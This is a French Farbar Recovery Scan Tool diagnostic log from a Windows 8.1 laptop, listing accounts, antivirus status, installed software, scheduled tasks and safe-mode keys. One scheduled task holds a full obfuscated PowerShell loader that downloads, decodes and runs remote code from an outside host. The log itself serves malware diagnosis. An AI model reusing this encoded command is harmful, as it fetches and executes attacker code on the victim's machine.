Résultats de l'Analyse supplémentaire de Farbar Recovery Scan Tool (x64) Version:09-01-2015
Exécuté par Lindsay.Neth (2016-01-09 21:33:53)
Exécuté depuis C:\Users\Lindsay.Neth\Desktop
Windows 8.1 Connected (X64) (2015-10-02 12:28:50)
Mode d'amorçage: Normal
==========================================================


==================== Comptes: =============================

Administrateur (S-1-5-21-452054049-3322805463-2325735685-500 - Administrator - Disabled)
Invité (S-1-5-21-452054049-3322805463-2325735685-501 - Limited - Disabled)
Lindsay.Neth (S-1-5-21-452054049-3322805463-2325735685-1001 - Administrator - Enabled) => C:\Users\Lindsay.Neth

==================== Centre de sécurité ========================

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé.)

AV: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Protection antivirus et antispyware McAfee (Enabled - Out of date) {DA9F8ED0-D0DE-39CC-F55A-51AB4CC1B556}
AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Protection antivirus et antispyware McAfee (Enabled - Out of date) {61FE6F34-F6E4-3642-CFEA-6AD93746FFEB}
FW: Pare-feu McAfee (Enabled) {E2A40FF5-9AB1-3894-DE05-F89EB212F22D}

==================== Programmes installés ======================

(Seuls les logiciels publicitaires ('adware') avec la marque 'caché' ('Hidden') sont susceptibles d'être ajoutés au fichier fixlist.txt pour qu'ils ne soient plus masqués. Les programmes publicitaires devront être désinstallés manuellement.)

Apple Application Support (64 bits) (HKLM\...\{0DE0A178-AC7B-4650-806C-CF226DE03766}) (Version: 4.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{3540181E-340A-4E7A-B409-31663472B2F7}) (Version: 9.1.0.6 - Apple Inc.)
Broadcom 802.11 Wireless LAN Adapter (HKLM\...\Broadcom 802.11 Wireless LAN Adapter) (Version: - Broadcom Corporation)
Broadcom Bluetooth Drivers (HKLM\...\{0A1B4690-E176-4533-8058-939480AEE1D0}) (Version: 12.0.0.9840 - Broadcom Corporation)
DisableMSDefender (Version: 1.0.0 - Hewlett-Packard Company) Hidden
Energy Star (HKLM\...\{465CA2B6-98AF-4E77-BE22-A908C34BB9EC}) (Version: 1.0.9 - Hewlett-Packard Company)
Hewlett-Packard ACLM.NET v1.2.2.3 (x32 Version: 1.00.0000 - Hewlett-Packard Company) Hidden
HP Registration Service (HKLM\...\{D1E8F2D7-7794-4245-B286-87ED86C1893C}) (Version: 1.2.7745.4851 - Hewlett-Packard)
HP Support Assistant (HKLM-x32\...\{79C54A05-F146-4EA0-8A70-D4EFE6181E52}) (Version: 8.1.40.3 - Hewlett-Packard Company)
HP Support Solutions Framework (HKLM-x32\...\{ED5CE45D-842B-4C18-A002-87E16EA39BB3}) (Version: 12.0.30.219 - Hewlett-Packard Company)
HP System Event Utility (HKLM-x32\...\{8B4EE87E-6D40-4C91-B5E8-0DC77DC412F1}) (Version: 1.4.1 - Hewlett-Packard Company)
HP Utility Center (HKLM\...\{403E9EFF-C4B4-4308-BA4E-7093B6BA03D5}) (Version: 2.5.5 - Hewlett-Packard Company)
HP Wireless Button Driver (HKLM-x32\...\{30B2D1D8-0A07-4B71-9553-0710C5D31E35}) (Version: 1.1.2.1 - Hewlett-Packard Company)
Intel(R) Dynamic Platform and Thermal Framework (HKLM-x32\...\FFD10ECE-F715-4a86-9BD8-F6F47DA5DA1C) (Version: 7.10.0.2210 - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3925 - Intel Corporation)
Intel(R) Sideband Fabric Device Driver (HKLM-x32\...\C5A8BC6E-723A-4C0F-96E1-C426D1A4BCA9) (Version: 1.70.305.16316 - Intel Corporation)
Intel(R) Trusted Execution Engine (HKLM\...\{176E2755-0A17-42C6-88E2-192AB2131278}) (Version: 1.0.0.1064 - Intel Corporation)
Java 8 Update 60 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218060F0}) (Version: 8.0.600.27 - Oracle Corporation)
Malwarebytes Anti-Malware version 2.2.0.1024 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.0.1024 - Malwarebytes)
McAfee LiveSafe - Internet Security (HKLM-x32\...\MSC) (Version: 14.0.6120 - McAfee, Inc.)
Metric Collection SDK 35 (x32 Version: 1.2.0010.00 - Lenovo Group Limited) Hidden
Microsoft OneDrive (HKU\S-1-5-21-452054049-3322805463-2325735685-1001\...\OneDriveSetup.exe) (Version: 17.3.6281.1202 - Microsoft Corporation)
Microsoft Silverlight (HKLM-x32\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.3.9600.29081 - Realtek Semiconductor Corp.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7339 - Realtek Semiconductor Corp.)
SHAREit (HKLM-x32\...\SHAREit_is1) (Version: 2.5.1.5 - Lenovo Group Limited)
Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 7.5.0.9082 - Microsoft Corporation)
Skype™ 7.17 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.17.105 - Skype Technologies S.A.)
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 18.1.20.0 - Synaptics Incorporated)
ZHPFix 2015 (HKLM-x32\...\ZHPFix_is1) (Version: 2015 - Nicolas Coolman)

==================== Personnalisé CLSID (Avec liste blanche): ==========================

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)


==================== Tâches planifiées (Avec liste blanche) =============

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)

Task: {1D21E8A7-473C-47B6-B1E5-EFC8A0D325D0} - System32\Tasks\Hewlett-Packard\HP Active Health\HP Active Health Scan (HPSA) => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPActiveHealth\ActiveHealth.exe [2015-11-04] (Hewlett-Packard)
Task: {221000E8-02A6-4D4A-A1E1-466B8840E57A} - System32\Tasks\HPCeeScheduleForLindsay.Neth => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2015-06-16] (Hewlett-Packard)
Task: {223CA993-C672-4DD5-9A45-7A3C1D8EE617} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Active Health Launcher => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPActiveHealth\ActiveHealth.exe [2015-11-04] (Hewlett-Packard)
Task: {335F3BC9-C2AC-47DC-AE06-AD8B7CC490D9} - System32\Tasks\McAfee\McAfee Auto Maintenance Task Agent
Task: {42D2829C-1354-4B7C-8997-0D11DEA3311D} - System32\Tasks\Intel Security DAT Reputation (AMCore) periodic endpoint safety pulse => C:\Program Files\Common Files\McAfee\AMContent\scanners\x86_64\datrep\21.0\mcdatrep.exe [2015-12-20] (McAfee, Inc.)
Task: {53C3FE6F-AB9D-40F6-AAE9-756018329D38} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2015-09-28] (Hewlett-Packard Company)
Task: {5B9B5BF1-DE86-4E08-AA08-DD4B54F19A54} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2015-09-28] (Hewlett-Packard Company)
Task: {5CB573AB-1FA3-4ECE-81C8-F0399A5E072A} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2015-09-27] (Hewlett-Packard)
Task: {6A64A194-140C-489A-8F08-C6996A32A847} - System32\Tasks\Lenovo\Lenovo Customer Feedback Program 64 35 => C:\Program Files (x86)\Lenovo\Customer Feedback Program 35\Lenovo.TVT.CustomerFeedback.Agent35.exe [2015-07-06] (Lenovo)
Task: {850AA318-D2B9-4283-A032-7F882FAF0456} - System32\Tasks\McAfee\McAfee Idle Detection Task
Task: {B8C5B817-77E3-4025-9821-C41C38362079} - System32\Tasks\{0A080A47-0404-047E-0D11-0D0D09051179} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAHMAZQBjAHUAcgBlAGIALgBpAG4AZgBvAC8AdQAvAD8AYQA9AEwAQQB0AEUAUgBJAEoAdQBzAHAALQAzAGQAeQA2AGMAdgBTADYAYwBFAG0AYgBBAFQAMQBvAFEAawBTAHIAagAzAFoANwBTAG0AVgBtAHIAZABXAHYANgBKAG4AcgBVAFYAUgAwAG8AagBnAHcAcwBiAHUAbgA2AHYAMQBWAG8AZgBrAGMAMgBwAC0AYgAtAHkASwBuAFEAVgA1AFgAZgAwAE8AWQAtAGwAMQA0AFgAawBDADUAawBGAEgAQwBoAGsATAB1AEQAUwBQADcAcQBZAGsANQBXAEIAMQA0AHYAbABqAHYAOAB4ADgAMQBrAHQANgBnAFoAbAB0AGkAYwBmAGgAeQBYADgAOQB4AGcASwB4AGkAdQBDAFoAeAByAEEAdwBrAGUAdQA0AE8AbQBVADQAeABPAGQAdQA2ADEARABHAHUAWABaAFkAZwBaAGcAUQBoAEoAdgBJAG4AQQBzAEgAdwBiAHQAYQB2AE0AMABwAFUAZQBtADgAMwB0AC0ASAB0AHIAOABVAEsAcQBiADYAVQAyADYAUABYAFYAegA4AE0ATQBpAEcAVgBiAHYAOQBRAGsAdQBSAHoASABFAFcAZABrADYAdQBmAG8ANwA2AFMAdQBhAFIAWABFAHAAcQAtAFYAbwAzAGYAZwB0AE4ATwBVAEcAdQBqAC0AWgBTAEUAawBvAE0AQQBDAFIANABaAEEAXwBhAEgAegBhAFMANwBiAE0AOQA5ADYAeABLAG4AOQBiAFoAZgBOAHEASQBrADAAOQBOAHoAZgBJAFkATQBEAEIAdgBKAGsAVQBBAGsAVwBHAEwAOABVAG4ANwBrAHcARAB5AHYAUQBsAFAAegBJAFIAaABtAGEAcAA4AE8AZQBhADUARgBHAFcAbwBSAE0ANAByAFkASgBqAHQALQB1AGMAdQBWAFAAQwBaAFgAaAByAGoAbgBoAG4AQwB6AFMAdgAyAC0ANQB3AF8AZQBnADgAQwBaAFEAegBUAEIAbAB0AFQAaABQADQATAB6ADAAZQB3AEoAWQB1ADQARgBfAHkAVQBRAFcAWgB2AF8AVgBnAFEARABtAHcAXwA1AFQAMABBAEwAMgBEADgATQBmAFcAYQBuAFoAbQB2AGQAawBCAHQAYgBlAEgAUgBZADEAbQB5AGoAQwBaADYAcABCAFcAdAB1AE4AegBDAHMALQBtAGkAdgBzAGcASwBtAGsAdQBkAGUAagBUAHAAVwBUAEQALQBkAG8AYwBhAGQARwBtAEIAWQBYAG8AbwB2AEIASwBLAEoAUwBnAEYANQBiAEsAOAAzAHYAZgBtAGEANwBIAHEAVgBwAC0AVwBsAHUAQgBTAEEAVABnAFIAZgBkAFIAcAAyAEQAVwBVAFAAdABBAHUAaQBLADAAaABiADAATABQADUAMwBFAGQASQAwADMAOQBCADAAbQBEAGMANABoADAAbABGAFcARQBKADYAdgB0AHYAXwBZAHcAdABwADgAVwBEAG4ASwBHAEQAOABHAG4AVQB3AGkAZQBvADUAYQBKAFkAegBhAGkATQBmADgAZgBRAC0ALQBIADMAWgBHAGwARwBOAEsATABSAFYARQBiADYANwBmAHkAbwBwAGIAcABoADIAOQBfAEoANwBwAEMAdwBYAFAANgBXADUAZAA3AFoAaQBZAEsAYgBnAEQAdgBTADEATgB5AHQAYwBWAFMANABvAGcAcABmAC0AOQBkAGIAbQBNAE4AeQBiAE8ARwAtAGQASgBNAGIAbABjAHQASABoAFQAUQBsAGIASgBpADgAMwAzAEMAQgA5AGYATgA5AG0AagByAGYANAA1AG4AeQB2AF8ASAB6AGMAbwBiAHkAegBYAC0AUgBNAEwASgBhAGIATwAzAGkAdQB5AFEAWQBqAHcAQwBkAEUAWgBZAGkAQgBYAHEAWgBkAGEATQBLAEUAOABEAGMANAByAEYAWABXAHEAVwAzAGUAQQBiAEkAWABrAG4AMAAxADUAZAAzAEcAaQA1AHEAdAA3AEMAMQB6AFAAdgA5ADIASwBKAEUAbwB3AFAAQQBZAEEARwB2AEIAZgBlAG0ASABQAEwAMQA4AHcAYwBQAGcAdgBkAGgATgB6AEMATQAwAGsAcgB2AGkARgB5AHEAWgBkAGQAMABJADUAZQBxAEcAdgAyAHgAeQBJAGwANgBfADcASwByAFkAWgBtAEcAWgBaAEcAQgBQAEwAWgBnAFMAZABMAEkAbgBCAFIAOAA1AGEAYwA1AHQAegBmAGgAZwAxADkATABvAHkAMwB1AEQAbwBnADQARABmAG8AMABmADkASwBWAEoANwBuAFMAbgA3AHkAYwBnAFQARAAwAFMAJgBjAD0AWgBlAEUARQBlADAAUQAwADcAaABQAEIAeABZAEIASgBmAGsAZwBiAEEANQByAHcATQBpADUANQAxAF8ATgAwAFAAZABpAHcANQBxADEAeQBLAHQAYwA0AGkAVABsAEUAWABJAEIATABWAGIAdgByAGYAeQBmAHcAcwA0AHoAcQBUAFEATABhAE4AcABtAHAAMQBYAGsAXwBLAEwAYgB0AGUAVgBOAFMAYwBJAGwAbQBuAHQAWgA4AFkAbwAyAEoAXwBLAGoAMAA3AHoATQBXAGIANgBwAFAAaQBzAEUAbAByAFQANwBnADQAaAA4AHQAOQBGAEwASQBpAHUAWQBwAGUAYwBoAEcAbABYAGcATABUAFAAQgA4AEYATwBkADgAUwAyAG8AawA4AEcAbABJAFgAaABlAHoAaABNAGYAMAA3AG4AcwB1AFkAQwBNAHYAYgAtAE8AcAA0ADMARABNAHkAcgBPAEcAMABTAEQAWABrAF8AVQBpAG8AdABGAGMAVQAwAHkAdQA5ADgAagBDAHEATQBTAGcAVgBaAHgANQBuAFEATABNADIAaAByAGUAUAB5ADMAOQB1AGkANQBNADcAXwBZAGMAWQBKAGYASgBLAE8ARgBNAE4AVgBqAE8AWQA5AE8AZwBMADMAeQBVAHQANgBfAG0ASABLAHgAZwB2AHQAUABSAG4AQwBQADEAWQBNAHQATgA4AGsAYQBIAHIAbQBWAEIAZwBHAEsAcwAwADcARgBnAEIAOQBXAFQASAB2AEgAMwB6AGQAYQBFAE8AUABHAGsAUwBNAGUAeABrAGMAVABpAHMASwBfAFMARgA1AFYAQwBnADMAUQBKAE4AegBpADIAaABGAE0ARQBqADMAdQB4AFUAbwBTADQAVgAtAHQAagByAEkAYgBjAFYASwBpADYAOQA3AFMAeABCAEUATABzAFkAVwBmADUAcQA3AEEAbwBfAE8AVABtAFgASABiAFcASQA3AFcAYwA4AC0AYQBSAFcAeQBQAGMAZwBtADcAdwBlAFYASwBGAEMAaQAzAGMAYwBhAGwAUQBDAGgAMwBEAEIAawAyAFEAbgBaADIAYwBwAEEARgBTADAAVwAzAGUAcQBwADMAWQB2ADEAVwBRAGQAZgBMAFgASAA4AC0AUAB5AG8ASAAwAGYAZgBDAHUARgBfAEUAVABtAFgAWQAzAG4ANgBlADkATgBIADIAUQBHAGMAcgA4ADkAbgBjAFkAcgBOADQAUQBPAE4ATQB0AEkAVQBXADkAdwBPADUAUQA0AHEAYgBTAE4ATgBoAFAAMwBkAFQAaQBvAGUALQBvADMANgA2AGkAUQA3AC0ANwA2AEMATwB4AFgAMABWAFkAOQA5ADYAUgBKAGEAcgA5ADIAMQB2AEQATgBjADcASwBsAGwARwBlAGsAdABwAHYAVQAyAHIAagB6AFEAeQBpAFEARQBFADAAOABfAEUAbQBiAEgAVABmAHEAQwBxAEYASABtAHcAQQAyAC0AMQA5AGgATgB0AEwAMABpAE4ATgBtAGMAbAA2AEgAWgBvAEgASAByAHcAMwBIAHkATgBMAHQASQBkAHIAQgBBADAAWAB1AFQASgA3AEYAZwByAHYAdgB3AEQAMABwAGMAUgA1ADkAMABXAFAARwBXAGgAbwBxAFIANABBAFAAawBnAHUAaQBUAE8ANABOAFoAdgAwAHoAVgAxAEEAMwBFAHUAZQBVAHQAWQBBAE4AeABUAG8AQwB6AFAAZQAwAGEAUAAyAFAAVgBNAEYAZABHAFEATgBvAEgAMgA5AFgAYwBDAEYAZgBPADcAWABsADAAYQBFADkAMwBJAGwAQgBDAHkAeABlAEoAMQBjAG0AVABfAHcATQBBAFoAZQBqAEcASABwAEsAaQBEAEcAYQBBAFUAaQBMADQANABQAHMARgBHAFgAZQBPAFEASQBzAEsAMwBoAGIAegBTAHkANwBOAHAAdQBvAFEAUgBYAC0AZgBGAGMATwBNAFgAawBnAGQAQgBXAGUAVwBHAFUAcABsAE0ATABNAEsAdQBtAEYAVAAxADUAaABlAHgAUABOAE0ATwBKAGUAOQBLAFYAYgBzAE8AQQA0AG8AQQBhAEkAWABjAGoARABHAEQAbABZAHMATQBHAFIATgBaADUAUQBDAGcAZABMAHgARABUADYALQB3AEMAbQBvAEEAdwByAG4ARgBIAE0AMQBRAGkAbQB5ADgAOABEAC0ATABjAEQAMQBNAFUAbwBjAHQAbwAzADIAYgBoAHoARABiADUAcQBFADcAQwBTAHIAWgA3AHUATwBzAEoANgBPAHIAVwBGAGoAbwBBAE8AMgBrAHUAWgBOAGMAMgA2AGMAdABFAHoATQB0AFIAdABXAEIAQgA0ADYAUgBMAEgAOABsADUAdQBlAHMAJgByAD0AMwA4ADYANwA1ADQANQA3ADMAMQA3ADcAMAA4ADUAMQAwADIANwAiADsAJABzAHQAcwBrAD0AIgB7ADAAQQAwADgAMABBADQANwAtADAANAAwADQALQAwADQANwBFAC0AMABEADEAMQAtADAARAAwAEQAMAA5ADAANQAxADEANwA5AH0AIgA7ACQAcAByAGkAZAA9ACIAUwB5AHMAdABlAG0ASABlAGEAbABlAHIAIgA7ACQAaQBuAGkAZAA9ACIASgBPAEwASwBCAEYARQBKACIAOwB0AHIAeQB7AGkAZgAoACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGwAdAAgADIAKQB7AGIAcgBlAGEAawA7AH0AJAB2AD0AWwBTAHkAcwB0AGUAbQAuAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBPAFMAVgBlAHIAcwBpAG8AbgAuAFYAZQByAHMAaQBvAG4AOwAKAGkAZgAoACQAdgAuAE0AYQBqAG8AcgAgAC0AZQBxACAANQApAHsAaQBmACgAKAAkAHYALgBNAGkAbgBvAHIAIAAtAGwAdAAgADIAKQAgAC0AQQBOAEQAIAAoACgARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBTAGUAcgB2AGkAYwBlAFAAYQBjAGsATQBhAGoAbwByAFYAZQByAHMAaQBvAG4AIAAtAGwAdAAgADIAKQApAHsAYgByAGUAYQBrADsAfQB9AAoAaQBmACgALQBOAE8AVAAgACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAUAByAGkAbgBjAGkAcABhAGwAXQBbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBJAGQAZQBuAHQAaQB0AHkAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdAAoACkAKQAuAEkAcwBJAG4AUgBvAGwAZQAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEIAdQBpAGwAdABJAG4AUgBvAGwAZQBdACAAIgBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByACIAKQApAHsAYgByAGUAYQBrADsAfQAKAGYAdQBuAGMAdABpAG8AbgAgAHcAYwAoACQAdQByAGwAKQB7ACQAcgBxAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAcgBxAC4AVQBzAGUARABlAGYAYQB1AGwAdABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAPQAkAHQAcgB1AGUAOwAkAHIAcQAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACIAdQBzAGUAcgAtAGEAZwBlAG4AdAAiACwAIgBNAG8AegBpAGwAbABhAC8ANAAuADAAIAAoAGMAbwBtAHAAYQB0AGkAYgBsAGUAOwAgAE0AUwBJAEUAIAA3AC4AMAA7ACAAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAKQAiACkAOwByAGUAdAB1AHIAbgAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAByAHEALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAdQByAGwAKQApADsAfQAKAGYAdQBuAGMAdABpAG8AbgAgAGQAcwB0AHIAKAAkAHIAYQB3AGQAYQB0AGEAKQB7ACQAYgB0AD0AWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHIAYQB3AGQAYQB0AGEAKQA7ACQAZQB4AHQAPQAkAGIAdABbADAAXQA7ACQAawBlAHkAPQAkAGIAdABbADEAXQAgAC0AYgB4AG8AcgAgADEANwAwADsAZgBvAHIAKAAkAGkAPQAyADsAJABpACAALQBsAHQAIAAkAGIAdAAuAEwAZQBuAGcAdABoADsAJABpACsAKwApAHsAJABiAHQAWwAkAGkAXQA9ACgAJABiAHQAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACgAKAAkAGsAZQB5ACAAKwAgACQAaQApACAALQBiAGEAbgBkACAAMgA1ADUAKQApADsAfQAKAHIAZQB0AHUAcgBuACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEQAZQBmAGwAYQB0AGUAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACQAYgB0ACwAMgAsACgAJABiAHQALgBMAGUAbgBnAHQAaAAtACQAZQB4AHQAKQApACkALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwB9AAoAJABzAGMAPQBkAHMAdAByACgAdwBjACgAJABzAHUAcgBsACkAKQA7AEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgAC0AYwBvAG0AbQBhAG4AZAAgACIAJABzAGMAIgA7AH0AYwBhAHQAYwBoAHsAfQA7AGUAeABpAHQAIAAwADsA
Task: {BA48FCCD-F364-42BF-B684-E7B4DCC4D3D1} - System32\Tasks\Microsoft\Windows\UPnP\UPnPHostConfig => config upnphost start= auto
Task: {C556AE37-1DCF-42B6-93ED-C8F80F108E52} - System32\Tasks\Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime => C:\Windows\system32\GWX\GWXUXWorker.exe [2015-12-05] (Microsoft Corporation)
Task: {DD73CA0E-AE9B-475D-9AF7-F0AEB3866F0D} - System32\Tasks\Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime => C:\Windows\system32\GWX\GWXUXWorker.exe [2015-12-05] (Microsoft Corporation)
Task: {E16DE63D-3EAF-40ED-B190-828A17B4FF27} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\Windows\system32\MRT.exe [2015-12-09] (Microsoft Corporation)
Task: {F9D4FB7D-25DC-47E3-BC8A-3BCF67701C79} - System32\Tasks\Microsoft OneDrive Auto Update Task-S-1-5-21-452054049-3322805463-2325735685-1001 => C:\Users\Lindsay.Neth\AppData\Local\Microsoft\OneDrive\OneDrive.exe [2015-12-13] (Microsoft Corporation)

(Si un élément est inclus dans le fichier fixlist.txt, le fichier tâche (.job) sera déplacé. Le fichier exécuté par la tâche ne sera pas déplacé.)

Task: C:\Windows\Tasks\HPCeeScheduleForLindsay.Neth.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe$HPCeeScheduleForLindsay.Neth (null)LINDSAY\Lindsay.Net

==================== Raccourcis =============================

(Les éléments sont susceptibles d'être inscrits dans le fichier fixlist.txt afin d'être supprimés ou restaurés.)

==================== Modules chargés (Avec liste blanche) ==============

2015-10-13 04:45 - 2015-10-13 04:45 - 00085800 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2015-10-13 04:45 - 2015-10-13 04:45 - 01328912 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll

==================== Alternate Data Streams (Avec liste blanche) =========

(Si un élément est inclus dans le fichier fixlist.txt, seul le flux de données additionnel (ADS - Alternate Data Stream) sera supprimé.)


==================== Mode sans échec (Avec liste blanche) ===================

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le "AlternateShell" sera restauré.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McNaiAnn => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk => ""="Service"
